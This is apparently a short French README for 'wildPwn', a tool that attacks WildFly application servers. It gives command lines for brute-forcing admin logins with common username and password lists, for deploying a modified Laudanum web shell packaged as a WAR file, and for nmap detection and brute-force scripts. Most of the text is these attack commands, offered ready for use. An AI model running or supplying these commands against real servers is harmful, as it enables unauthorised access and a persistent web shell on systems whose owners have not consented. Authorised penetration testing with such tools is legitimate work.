
Bruteforceur et déployeur de shell pour WildFly
C'est un outil pour WildFly. L'outil peut être utilisé pour le brute force ou le déploiement de shell. wildPwn.war contient un shell Laudanum modifié. userList.txt contient des noms d'utilisateur courants et passList.txt contient des mots de passe courants.
Bruteforce
python wildPwn.py -m brute --target <TARGET> -user <USERNAME LIST> -pass <PASSWORD LIST>
Déploiement de Shell
python wildPwn.py -m deploy --target <TARGET> --port <PORT> -u <USERNAME> -p <PASSWORD>
https://artofpwn.com/wildfly-exploitation.html
Détection
nmap --script wildfly-detect <TARGET>
Brute Force
nmap -p 9990 --script wildfly-brute --script-args "userdb=usernameList.txt,passdb=passList.txt,hostname=domain.com" <TARGET>